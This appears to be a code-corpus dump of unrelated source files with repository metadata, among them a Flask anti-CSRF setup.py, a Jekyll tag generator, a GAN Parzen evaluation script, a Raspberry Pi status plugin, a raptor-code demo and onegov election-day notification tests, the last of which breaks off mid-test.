description='Experimental anti-CSRF library for Flask apps',
long_description=long_description,
author='Skyler Berg',
author_email='[email protected]',
url='https://github.com/skylerberg/Flask-AntiCsrf',
keywords='csrf xsrf security flask',
install_requires=['Flask'],
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Security',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
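# Local development install (sketch; a standard setuptools workflow assumed):
#   pip install -e .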
| 34.925 | 71 | 0.644953 |
886d2a4ee1d87c59b9565562083e48851185958e
| 1,727 |
py
|
Python
|
tag_pages_generator.py
|
rekindle-blog/rekindle-blog.github.io
|
ec17014be5435ed229bcbfaac6e970485a6e1d7d
|
[
"MIT"
] | null | null | null |
tag_pages_generator.py
|
rekindle-blog/rekindle-blog.github.io
|
ec17014be5435ed229bcbfaac6e970485a6e1d7d
|
[
"MIT"
] | 2 |
2021-07-13T21:22:51.000Z
|
2021-09-28T05:51:31.000Z
|
tag_pages_generator.py
|
rekindle-blog/rekindle-blog.github.io
|
ec17014be5435ed229bcbfaac6e970485a6e1d7d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
'''
Initial version by Long Qian
Modified by James Cuénod
'''
import os
import yaml
post_dir = '_posts/'
tag_dir = 'tag/'
def get_filenames():
files = []
for path in os.listdir(post_dir):
if path.endswith(".md") or path.endswith(".html"):
files.append(post_dir + path)
return files
filenames = get_filenames()
total_tags = []
for filename in filenames:
    f = open(filename, 'r', encoding='utf8')
    crawl = False
    file_yml_string = ""
    for line in f:
        if line.strip() == '---':
            if not crawl:
                crawl = True
                continue  # skip the opening '---' delimiter itself
            else:
                crawl = False
                break
        if crawl:
            file_yml_string += line  # 'line' already ends with '\n'
    f.close()
yaml_object = yaml.safe_load(file_yml_string)
if "tags" in yaml_object:
total_tags.extend(yaml_object["tags"])
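# Expected front matter shape (illustrative):
#   ---
#   title: "A post"
#   tags: [tag-one, tag-two]
#   ---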
total_tags = set([t.strip() for t in total_tags])
tl = list(total_tags)
tl.sort()
print(tl)
existing_tags = []
old_tags = os.listdir(tag_dir)
for tag in old_tags:
if tag.endswith(".md"):
os.remove(tag_dir + tag)
existing_tags.append(tag)
if not os.path.exists(tag_dir):
os.makedirs(tag_dir)
for tag in total_tags:
tag_filename = tag_dir + tag.replace(" ", "-") + '.md'
f = open(tag_filename, 'a')
write_str = '---\nlayout: tag_page\ntitle: \"Tag: ' + tag + '\"\ntag: ' + tag + '\nrobots: noindex\n---\n'
f.write(write_str)
f.close()
print("---")
print("Tags generated:")
total_tag_count = len(total_tags)
print("Total Tags: ", str(total_tag_count).rjust(4))
new_tag_count = total_tag_count - len(existing_tags)
print("Total New:  ", str(new_tag_count).rjust(4))
| 24.323944 | 110 | 0.603937 |
ee6e890d435510c714af0dce26594e40b543591c
| 4,526 |
py
|
Python
|
research/cv/gan/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/gan/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/gan/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" postprocess """
import os
import time
import gc
import numpy as np
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
from PIL import Image
from src.param_parse import parameter_parser
from src.dataset import load_test_data
opt = parameter_parser()
print(opt)
def log_mean_exp(a):
max_ = a.max(axis=1)
max2 = max_.reshape(max_.shape[0], 1)
return max_ + np.log(np.exp(a - max2).mean(1))
def mind_parzen(x, mu, sigma):
''' mind parzen '''
a = (x.reshape(x.shape[0], 1, x.shape[-1]) - mu.reshape(1, mu.shape[0], mu.shape[-1])) / sigma
a5 = -0.5 * (a ** 2).sum(2)
E = log_mean_exp(a5)
t4 = sigma * np.sqrt(np.pi * 2)
t5 = np.log(t4)
Z = mu.shape[1] * t5
return E - Z
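# Together, log_mean_exp and mind_parzen compute the Parzen-window estimate
#   log p(x) = log( (1/N) * sum_i N(x; mu_i, sigma^2 I) )
# in log space: E is the log-mean over the exponentiated squared distances to
# the samples mu_i, and Z is the log of the Gaussian normalizer
# (sigma * sqrt(2*pi)) ** D.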
def get_nll(x, samples, sigma, batch_size=10):
'''get_nll'''
inds = range(x.shape[0])
inds = list(inds)
n_batches = int(np.ceil(float(len(inds)) / batch_size))
times = []
nlls = np.array([]).astype(np.float32)
for l in range(n_batches):
begin = time.time()
nll = mind_parzen(x[inds[l::n_batches]], samples, sigma)
end = time.time()
times.append(end - begin)
nlls = np.concatenate((nlls, nll))
if l % 10 == 0:
print(l, np.mean(times), nlls.mean())
return nlls
def cross_validate_sigma(samples, data, sigmas, batch_size):
'''cross_validate_sigma'''
lls = np.array([]).astype(np.float32)
for sigma in sigmas:
print(sigma)
tmp = get_nll(data, samples, sigma, batch_size=batch_size)
tmp = tmp.mean()
tmp = tmp.reshape(1, 1)
tmp = tmp.squeeze()
lls = np.concatenate((lls, tmp))
gc.collect()
ind = lls.argmax()
return sigmas[ind]
def get_test():
dataset = load_test_data().astype("float32")
image = dataset
image = image.reshape(image.shape[0], 784)
return image
def parzen(samples):
'''parzen'''
shape = samples.shape
samples = samples.reshape(shape[0], -1)
sigma = 0.16681005372000587
print("Using Sigma: {}".format(sigma))
gc.collect()
test_data = get_test()
test_data = test_data / 255
ll = get_nll(test_data, samples, sigma, batch_size=opt.batch_size_t)
se = ll.std() / np.sqrt(test_data.shape[0])
print("Log-Likelihood of test set = {}, se: {}".format(ll.mean(), se))
return ll.mean(), se
test_latent_code_parzen = np.random.normal(size=(10000, opt.latent_dim)).astype(np.float32)
def save_imgs2(gen_imgs, idx):
'''save images'''
index = gen_imgs < 1
gen_imgs[index] = 0
index = gen_imgs > 250
gen_imgs[index] = 255
for k in range(gen_imgs.shape[0]):
plt.subplot(5, 20, k + 1)
plt.imshow(gen_imgs[k, 0, :, :], cmap="gray")
plt.axis("off")
plt.savefig("./images2/{}.png".format(idx))
if __name__ == "__main__":
args_opt = parameter_parser()
imageSize = args_opt.img_size
nc = 1
f_name = os.path.join("ascend310_infer/result_files", 'gan_bs_0.bin')
fake = np.fromfile(f_name, np.float32).reshape(10000, nc, imageSize, imageSize)
fake = np.multiply(fake, 0.5*255)
fake = np.add(fake, 0.5*255)
for j in range(10000):
        img_pil = fake[j, ...].reshape(nc, imageSize, imageSize)
        img_pil = img_pil[0].astype(np.uint8)  # drop the channel axis (nc == 1) to get an (H, W) grayscale array
        img_pil = Image.fromarray(img_pil)
img_pil.save(os.path.join("images", "generated_%02d.png" % j))
print("Generate images success!")
size = 28
imag = []
for i in range(10000):
img_temp = mpimg.imread(os.path.join("images", "generated_%02d.png" % i))
img_temp = img_temp.reshape(1, size, size)
imag.append(img_temp)
imag = np.array(imag)
samples1 = imag
mean_ll, se_ll = parzen(samples1)
print("Log-Likelihood of test set = {}, se: {}".format(mean_ll, se_ll))
| 32.561151 | 98 | 0.62616 |
c9b0ca723a1f361024c4f7f2651ae0d1f9d76c92
| 308 |
pyde
|
Python
|
sketches/with/with.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 4 |
2018-06-03T02:11:46.000Z
|
2021-08-18T19:55:15.000Z
|
sketches/with/with.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | null | null | null |
sketches/with/with.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 3 |
2019-12-23T19:12:51.000Z
|
2021-04-30T14:00:31.000Z
|
# with-Statement
def setup():
size(400, 400)
background(255)
def draw():
fill(color(255, 153, 0))
ellipse(100, 100, 50, 50)
with pushStyle():
fill(color(255, 51, 51))
strokeWeight(5)
ellipse(200, 200, 50, 50)
ellipse(300, 300, 50, 50)
| 17.111111 | 34 | 0.519481 |
c9b5b4f61fb3a1cbbcb2e6cc2503783afb2992a1
| 2,107 |
py
|
Python
|
.xiaobu/custom/RaspberryPiStatus.py
|
hanyanze/FS_AILPB
|
7756551cf926aa6296ec851dd696c97d56e06bca
|
[
"Apache-2.0"
] | 1 |
2020-07-16T02:52:47.000Z
|
2020-07-16T02:52:47.000Z
|
.xiaobu/custom/RaspberryPiStatus.py
|
hanyanze/FS_AILPB
|
7756551cf926aa6296ec851dd696c97d56e06bca
|
[
"Apache-2.0"
] | null | null | null |
.xiaobu/custom/RaspberryPiStatus.py
|
hanyanze/FS_AILPB
|
7756551cf926aa6296ec851dd696c97d56e06bca
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8-*-
# Raspberry Pi status plugin
import os
from robot import logging
from robot.sdk.AbstractPlugin import AbstractPlugin
logger = logging.getLogger(__name__)
class Plugin(AbstractPlugin):
SLUG = "pi_status"
def getCPUtemperature(self):
result = 0.0
try:
tempFile = open("/sys/class/thermal/thermal_zone0/temp")
res = tempFile.read()
result = float(res) / 1000
except:
            # Speaks: "Sorry, unable to read the CPU temperature"
            self.say(u'抱歉,无法获取处理器温度', cache=True)
return result
def getRAMinfo(self):
p = os.popen('free')
i = 0
        while True:
i = i + 1
line = p.readline()
if i == 2:
return (line.split()[1:4])
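        # Illustrative `free` output (values hypothetical); line 2 is parsed:
        #               total        used        free   shared  buff/cache ...
        # Mem:        948304      210112      512344      ...
        # so split()[1:4] yields [total, used, free] in KiB.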
def getDiskSpace(self):
p = os.popen("df -h /")
i = 0
        while True:
            i = i + 1
line = p.readline()
if i == 2:
return (line.split()[1:5])
def getPiStatus(self):
result = {'cpu_tmp': 0.0,
'ram_total': 0, 'ram_used': 0, 'ram_percentage': 0,
'disk_total': '0.0', 'disk_used': '0.0','disk_percentage': 0}
result['cpu_tmp'] = self.getCPUtemperature()
ram_stats = self.getRAMinfo()
result['ram_total'] = int(ram_stats[0]) / 1024
result['ram_used'] = int(ram_stats[1]) / 1024
result['ram_percentage'] = int(result['ram_used'] * 100 / result['ram_total'])
disk_stats = self.getDiskSpace()
result['disk_total'] = disk_stats[0]
result['disk_used'] = disk_stats[1]
result['disk_percentage'] = disk_stats[3].split('%')[0]
return result
def handle(self, text, parsed):
try:
status = self.getPiStatus()
            # Speaks: "CPU temperature <X> degrees, RAM at <Y> percent, disk at <Z> percent"
            self.say(u'处理器温度' + str(status['cpu_tmp']) + u'度,内存使用百分之' + str(status['ram_percentage']) + u',存储使用百分之' + str(status['disk_percentage']))
except Exception as e:
logger.error(e)
            # Speaks: "Sorry, I could not get the Raspberry Pi status"
            self.say(u'抱歉,我没有获取到树莓派状态', cache=True)
def isValid(self, text, parsed):
        # Trigger phrases: "Raspberry Pi status", "status", "running status"
        return any(word in text for word in [u"树莓派状态", u"状态", u"运行状态"])
| 31.447761 | 149 | 0.542952 |
6dc9002e1c8726bf117e98e28fc6f0d87fd91549
| 586 |
py
|
Python
|
src/onegov/core/orm/mixins/__init__.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/core/orm/mixins/__init__.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/core/orm/mixins/__init__.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.core.orm.mixins.content import content_property
from onegov.core.orm.mixins.content import ContentMixin
from onegov.core.orm.mixins.content import data_property
from onegov.core.orm.mixins.content import dict_property
from onegov.core.orm.mixins.content import meta_property
from onegov.core.orm.mixins.publication import UTCPublicationMixin
from onegov.core.orm.mixins.timestamp import TimestampMixin
__all__ = [
'content_property',
'ContentMixin',
'data_property',
'dict_property',
'meta_property',
'TimestampMixin',
'UTCPublicationMixin',
]
| 30.842105 | 66 | 0.793515 |
116103b6c11d54ffdec248ffae2443f3d84115f5
| 385 |
py
|
Python
|
pacman-arch/test/pacman/tests/upgrade072.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade072.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade072.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Install a package with a missing dependency (nodeps)"
p = pmpkg("dummy")
p.files = ["bin/dummy",
"usr/man/man1/dummy.1"]
p.depends = ["dep1"]
self.addpkg(p)
self.args = "-Udd %s" % p.filename()
self.addrule("PACMAN_RETCODE=0")
self.addrule("PKG_EXIST=dummy")
self.addrule("PKG_DEPENDS=dummy|dep1")
for f in p.files:
self.addrule("FILE_EXIST=%s" % f)
| 24.0625 | 73 | 0.675325 |
3a2d19ae806ea485e094c3010253894ae8f262a3
| 231 |
py
|
Python
|
tests/web.adblockplus.org/data/dataDonationPages.py
|
adblockplus/web.adblockplus.org
|
c2c570ce4f4296afc3577afe233c6b23b128f206
|
[
"MIT"
] | 9 |
2016-01-29T18:05:29.000Z
|
2021-10-06T04:21:55.000Z
|
tests/web.adblockplus.org/data/dataDonationPages.py
|
adblockplus/web.adblockplus.org
|
c2c570ce4f4296afc3577afe233c6b23b128f206
|
[
"MIT"
] | 9 |
2015-04-06T19:03:32.000Z
|
2019-05-28T13:34:55.000Z
|
tests/web.adblockplus.org/data/dataDonationPages.py
|
adblockplus/web.adblockplus.org
|
c2c570ce4f4296afc3577afe233c6b23b128f206
|
[
"MIT"
] | 18 |
2015-04-06T17:42:31.000Z
|
2021-10-06T04:26:29.000Z
|
TEST_DATA = [(
'donation_page',
'https://adblockplus.org/donate',
), (
'update_page',
'https://new.adblockplus.org/update',
), (
'first_run_page',
'https://welcome.adblockplus.org/installed'
)]
| 19.25 | 49 | 0.584416 |
c9834d3a9fd2f27a14bef81edff915058e97365c
| 865 |
py
|
Python
|
cktsim/sim/urls.py
|
Rajarshi07/cktsim
|
35f85a5240b940bfd0c0f5fb15cf59da57f92587
|
[
"MIT"
] | null | null | null |
cktsim/sim/urls.py
|
Rajarshi07/cktsim
|
35f85a5240b940bfd0c0f5fb15cf59da57f92587
|
[
"MIT"
] | null | null | null |
cktsim/sim/urls.py
|
Rajarshi07/cktsim
|
35f85a5240b940bfd0c0f5fb15cf59da57f92587
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('allckts/', views.allckts, name='allckts'),
path('adder/hadd/', views.hadd, name='halfadder'),
path('adder/fadd/', views.fadd, name='fulladder'),
path('subtractor/hsub/', views.hsub, name='halfsubstractor'),
path('subtractor/fsub/', views.fsub, name='fullsubstractor'),
    path('gate/and/', views.gate_and, name='gate_and'),
    path('gate/or/', views.gate_or, name='gate_or'),
    path('gate/xor/', views.gate_xor, name='gate_xor'),
    path('gate/xnor/', views.gate_xnor, name='gate_xnor'),
    path('gate/nand/', views.gate_nand, name='gate_nand'),
    path('gate/nor/', views.gate_nor, name='gate_nor'),
    path('gate/not/', views.gate_not, name='gate_not'),
    path('comparator/comp1bit/', views.comp1bit, name='comp1bit'),
]
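# With this urlconf included at the project root (an assumption about the
# project-level include), names resolve as e.g.:
#   reverse('halfadder') -> '/adder/hadd/'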
| 43.25 | 65 | 0.660116 |
a3293426b4a0b24e55bbd137577dd253291f5281
| 1,563 |
py
|
Python
|
doc/fb_memoir/python/induc.py
|
ghsecuritylab/project-powerline
|
6c0ec13bbfc11c3790c506f644db4fe45021440a
|
[
"MIT"
] | null | null | null |
doc/fb_memoir/python/induc.py
|
ghsecuritylab/project-powerline
|
6c0ec13bbfc11c3790c506f644db4fe45021440a
|
[
"MIT"
] | null | null | null |
doc/fb_memoir/python/induc.py
|
ghsecuritylab/project-powerline
|
6c0ec13bbfc11c3790c506f644db4fe45021440a
|
[
"MIT"
] | 1 |
2020-03-08T01:50:58.000Z
|
2020-03-08T01:50:58.000Z
|
#!/usr/bin/env python3
import numpy as np
# Calculate Inductance of Rectangle
a = 10 # length
b = 3
#b = np.sqrt(2*5)
#bInner = 2
#bOuter = 5
d = np.sqrt(a**2 + b**2) # diagonal
s = 4e-6 # section surface of wire
rho = np.sqrt(s/np.pi) # radius of wire
mu0 = 4*np.pi*1e-7 # electromagnetic constant
# Terms for Inductance Calculation
A = (a+b)*np.log(2*a*b/rho)
B = a*np.log(a+d)
C = b*np.log(b+d)
D = 7/4 * (a+b)
E = 2*(d+rho)
# Inductance
Lrect = mu0/np.pi * (A - B - C - D + E)
print("Panel Array Rectangle Inductance: ", Lrect*1e6, "muH")
# Calculate Inductance of Two-Wire Setup
dw = 20e-3 # distance between wires
l = 20 # length of single wire
Lwire = mu0*l/np.pi * (np.log(dw/rho)+1/4)
print("Dual-Wire Inductance: ", Lwire*1e6, "muH")
# Calculate Inductance of PV Panel Wiring
# Middle wires
lPV = 1.5
dPV = 125e-3
LPVmiddle = mu0*lPV/(2*np.pi) * (np.log(dPV/rho) + 1/4-np.log(4/3))
LPVouter = mu0*lPV/(2*np.pi) * (np.log(dPV/rho) + 1/4-np.log(3/2))
LPV2nd = mu0*lPV/(2*np.pi) * (np.log(dPV/rho) + 1/4-np.log(8/3))
#print(LPVmiddle)
#print(LPV2nd)
#print(LPVouter)
LPVPanel = (LPVmiddle + LPVouter + LPV2nd)*2*20
print("Total Panel Wiring Inductance: ", LPVPanel*1e6, "muH")
print("Total Inductance of DC Line: ", (Lrect + Lwire + LPVPanel)*1e6, "muH");
# Inductance of Piece of Wire interacting with Signal Coil
lInteract = 10e-3
muCopper = 1.256629e-6
Linteraction = mu0/(2*np.pi)*(np.log(2*lInteract/rho)-1+muCopper/4)
print("Interactive Inductance:", Linteraction, "muH")
| 26.948276 | 78 | 0.634037 |
28596eea00f6e54a8cb03d3c432442a23adfaaa3
| 267 |
py
|
Python
|
mqtt/mqtt_publish.py
|
wichmann/RaspPI
|
168609cb237e59a4c895eae798c0dab052aab38b
|
[
"MIT"
] | null | null | null |
mqtt/mqtt_publish.py
|
wichmann/RaspPI
|
168609cb237e59a4c895eae798c0dab052aab38b
|
[
"MIT"
] | null | null | null |
mqtt/mqtt_publish.py
|
wichmann/RaspPI
|
168609cb237e59a4c895eae798c0dab052aab38b
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
# Install the required library:
# pip3 install paho-mqtt
import paho.mqtt.publish as publish
# publish a single message on the given topic
publish.single("test/topic", "nachricht", hostname="192.168.24.132")
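# Quick manual check (assumes the Mosquitto command-line clients are installed):
#   mosquitto_sub -h 192.168.24.132 -t test/topic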
| 20.538462 | 68 | 0.756554 |
6c7c205548401d130df6ab07cd60084e4937498e
| 1,548 |
py
|
Python
|
timing.py
|
timwuu/SokobanSolver
|
ae6d73516efa70fbf56ed4ca920b5ddc427d095d
|
[
"MIT"
] | null | null | null |
timing.py
|
timwuu/SokobanSolver
|
ae6d73516efa70fbf56ed4ca920b5ddc427d095d
|
[
"MIT"
] | null | null | null |
timing.py
|
timwuu/SokobanSolver
|
ae6d73516efa70fbf56ed4ca920b5ddc427d095d
|
[
"MIT"
] | null | null | null |
import numpy as np
import hashlib
import datetime
MAX_STEP_COUNT_LST_SIZE = 256
g_lst_1 = np.empty((MAX_STEP_COUNT_LST_SIZE, 2),dtype='i4')
g_lst_2 = np.empty((MAX_STEP_COUNT_LST_SIZE, 2),dtype='i4')
g_lst_3 = np.empty((MAX_STEP_COUNT_LST_SIZE*2),dtype='u2')
g_lst_4 = np.empty((MAX_STEP_COUNT_LST_SIZE*2),dtype='u2')
def Loop():
    # Leftover locals from the earlier benchmark variants documented in the
    # comments at the bottom of this file; only the sha256 loop is timed now.
    lst_a, lst_b = g_lst_3, g_lst_4
    a = 3
    b = 4
    length = 0
    x, y = 4, 6
    player = [2, 3]
    box = [[3, 3], [3, 4], [3, 5], [4, 4], [4, 5]]
npbox = np.array( box, dtype='b')
for i in range(0,10000):
for k in range(0,MAX_STEP_COUNT_LST_SIZE):
m = hashlib.sha256()
m.update( bytes(player))
m.update( npbox.tobytes())
m.hexdigest()
pass
start_time = datetime.datetime.now()
Loop()
diff_time = datetime.datetime.now() - start_time
print( "Time Used: {}".format(diff_time))
# 2.8~2.9 per 10,000^2
# a,b = b,a
# lst_a, lst_b = lst_b, lst_a
# 'u2' np.array
# 1.6~1.7 per 10,000*256
# lst_a[k]=[x-1,y]
# k += 1
# 0.26~0.28 per 10,000*256
# lst_a.append([x-1,y])
# 0.18~0.19 per 10,000*256
# lst_a[k]=[x-1,y]
# 0.43~0.47 per 10,000*256
# lst_a[k],lst_b[k]=x-1,y
# 6.66 per 10,000*256
# m = hashlib.sha256()
# m.update( bytes(player))
# for elem in box:
# m.update( bytes(elem))
# m.hexdigest()
# 3.6 per 10,000*256
# m = hashlib.sha256()
# m.update( bytes(player))
# m.update( npbox.tobytes())
# m.hexdigest()
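# A lighter-weight way to time such variants (a sketch using the standard
# library's timeit module; the figures above came from the hand-rolled Loop()):
# import timeit
# player = [2, 3]; npbox = np.array([[3,3],[3,4],[3,5],[4,4],[4,5]], dtype='b')
# t = timeit.timeit(
#     "m = hashlib.sha256(); m.update(bytes(player)); m.update(npbox.tobytes()); m.hexdigest()",
#     globals=globals(), number=10000*256)
# print("Time Used:", t)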
| 18.878049 | 59 | 0.560724 |
dd5f0a9258c42e65bdea33af16411fb664614a02
| 3,401 |
py
|
Python
|
21-fs-ias-lec/13-RaptorCode/src/demo.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 8 |
2020-03-17T21:12:18.000Z
|
2021-12-12T15:55:54.000Z
|
21-fs-ias-lec/13-RaptorCode/src/demo.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 2 |
2021-07-19T06:18:43.000Z
|
2022-02-10T12:17:58.000Z
|
21-fs-ias-lec/13-RaptorCode/src/demo.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 25 |
2020-03-20T09:32:45.000Z
|
2021-07-18T18:12:59.000Z
|
from numpy import random # only used to simulate data loss
from decoder import Decoder # necessary for the functionality
from encoder import Encoder # necessary for the functionality
from utils import NUMBER_OF_ENCODED_BITS # only used for statistic
# showcase steering elements:
STOP_ENCODER_ON_DECODING = True  # whether the encoder stops generating packages once decoding succeeded
# (in real life this can only happen when the sender can be informed)
HAS_PACKAGE_LOSS = False  # whether the loss of packages is simulated
PROBABILITY_OF_LOSS = 0.5  # probability that a package is lost (when package loss is activated)
PRINT_STATISTICS = True  # whether the statistic will be printed
# necessary variables
encoder = Encoder(500) # the Number set how many packages the encoder maximally generates (optional)
decoder = Decoder()
# the following is an example of transmitted data. (Since it takes bytes the string has to be encoded).
# the input has to have a multiple length of 32 bits (4 bytes) or it will not be processed
exampleTransmissionData = "Lorem ipsum dolor sit amet, consectetur adipisici elit, sed diam nonumy.".encode('utf8')
# variables for the statistic (not relevant)
numberOfPackages = 0 # counts how many packages were sent for every decoded Data
temp_numberOfPackages = 0 # help variable for same task
numberOfDecodedInformation = 0 # counts number of successfully decoding data
# demo code
for package in encoder.encode(exampleTransmissionData): # the encode function of the decoder acts as a generator
# which yields utils.TransmissionPackage.
temp_numberOfPackages += 1 # counter for statistic (not relevant)
    # simulation of package loss (only when activated above)
    if HAS_PACKAGE_LOSS and random.random() < PROBABILITY_OF_LOSS:
        continue
txt = decoder.decode(package) # decoder.decode(TransmissionPackage) tries to decode the information. If there is
# not enough information it returns None, else it returns the decoded bytes
if txt is not None: # check whether the decoder was successful
numberOfDecodedInformation += 1 # counter for statistics (not relevant)
numberOfPackages += temp_numberOfPackages # counter for statistics (not relevant)
temp_numberOfPackages = 0 # counter for statistics (not relevant)
        print(numberOfDecodedInformation, txt.decode('utf8'))  # the decoded data gets printed (it has to be
        # decoded, since it's bytes and we want a string)
if STOP_ENCODER_ON_DECODING: # steering structure for demo (not relevant)
break
# statistics
if numberOfDecodedInformation == 0: # check if there was a successful decoding
print("Ran out of packages before first successful decoding!") # if not print that it wasn't successful
elif PRINT_STATISTICS: # also check if printing of the statistic is activated
# calculate how many chunks there are for the data
numberOfChunks = int(len(exampleTransmissionData) / (NUMBER_OF_ENCODED_BITS / 8))
print("Number of Chunks:\t\t" + str(numberOfChunks)) # print that number
# number of encoded packages for sending
print("avg. Number of Packages Needed:\t" + str(numberOfPackages / numberOfDecodedInformation))
# number of encoded packages for sending per chunk
print("avg. per chunk:\t\t\t" + str(int(numberOfPackages / numberOfChunks) / numberOfDecodedInformation))
| 57.644068 | 117 | 0.7586 |
b0d1c34511e3f9a65f226a452c09abc99a99d5b5
| 4,448 |
py
|
Python
|
tests/onegov/election_day/forms/test_notification_form.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/election_day/forms/test_notification_form.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/election_day/forms/test_notification_form.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from datetime import date
from onegov.ballot import Election
from onegov.ballot import ProporzElection
from onegov.ballot import Vote
from onegov.election_day.forms import TriggerNotificationForm
from onegov.election_day.forms import TriggerNotificationsForm
from tests.onegov.election_day.common import DummyPostData
from tests.onegov.election_day.common import DummyRequest
def test_notification_form():
form = TriggerNotificationForm()
form.request = DummyRequest()
form.on_request()
assert form.notifications.choices == []
assert not form.validate()
form.request.app.principal.email_notification = True
form.on_request()
assert form.notifications.choices == [('email', 'Email')]
assert 'email' in form.notifications.default
form.request.app.principal.sms_notification = 'http://example.com'
form.on_request()
assert form.notifications.choices == [('email', 'Email'), ('sms', 'SMS')]
assert 'email' in form.notifications.default
assert 'sms' in form.notifications.default
form.request.app.principal.webhooks = {'http://abc.com/1': None}
form.on_request()
assert form.notifications.choices == [
('email', 'Email'), ('sms', 'SMS'), ('webhooks', 'Webhooks')
]
assert form.notifications.data == ['email', 'sms', 'webhooks']
assert 'sms' in form.notifications.default
assert 'webhooks' in form.notifications.default
def test_notifications_form(session):
form = TriggerNotificationsForm()
form.request = DummyRequest(session=session)
form.on_request()
assert form.notifications.choices == []
assert form.elections.choices == []
assert form.votes.choices == []
assert form.latest_date(session) is None
assert not form.validate()
# Enable notification
form.request.app.principal.email_notification = True
form.request.app.principal.sms_notification = 'http://example.com'
form.request.app.principal.webhooks = {'http://abc.com/1': None}
# Add votes and elections
session.add(
Vote(
title='Vote 1',
shortcode='f',
domain='canton',
date=date(2015, 1, 1)
)
)
session.add(
Vote(
title='Vote 2',
shortcode='e',
domain='federation',
date=date(2015, 2, 1)
)
)
session.add(
Vote(
title='Vote 3',
shortcode='d',
domain='canton',
date=date(2015, 2, 1)
)
)
session.add(
Election(
title='Majorz Election 1',
shortcode='c',
domain='canton',
date=date(2015, 2, 1)
)
)
session.add(
Election(
title='Majorz Election 2',
shortcode='b',
domain='region',
date=date(2015, 2, 1)
)
)
session.add(
ProporzElection(
title='Proporz Election',
shortcode='a',
domain='canton',
date=date(2015, 1, 10)
)
)
session.flush()
# Test on_request
form.on_request()
assert form.notifications.choices == [
('email', 'Email'), ('sms', 'SMS'), ('webhooks', 'Webhooks')
]
assert form.notifications.data == ['email', 'sms', 'webhooks']
assert 'email' in form.notifications.default
assert 'sms' in form.notifications.default
assert 'webhooks' in form.notifications.default
assert form.latest_date(session) == date(2015, 2, 1)
assert form.votes.choices == [
('vote-3', 'Vote 3'),
('vote-2', 'Vote 2')
]
assert form.elections.choices == [
('majorz-election-2', 'Majorz Election 2'),
('majorz-election-1', 'Majorz Election 1')
]
assert form.vote_models(session) == []
assert form.election_models(session) == []
# Test submit
form = TriggerNotificationsForm(
DummyPostData({
'notifications': ['email'],
'votes': ['vote-3', 'vote-2'],
'elections': ['majorz-election-2']
})
)
form.request = DummyRequest(session=session)
form.request.app.principal.email_notification = True
form.on_request()
assert form.validate()
assert [vote.id for vote in form.vote_models(session)] == [
'vote-3',
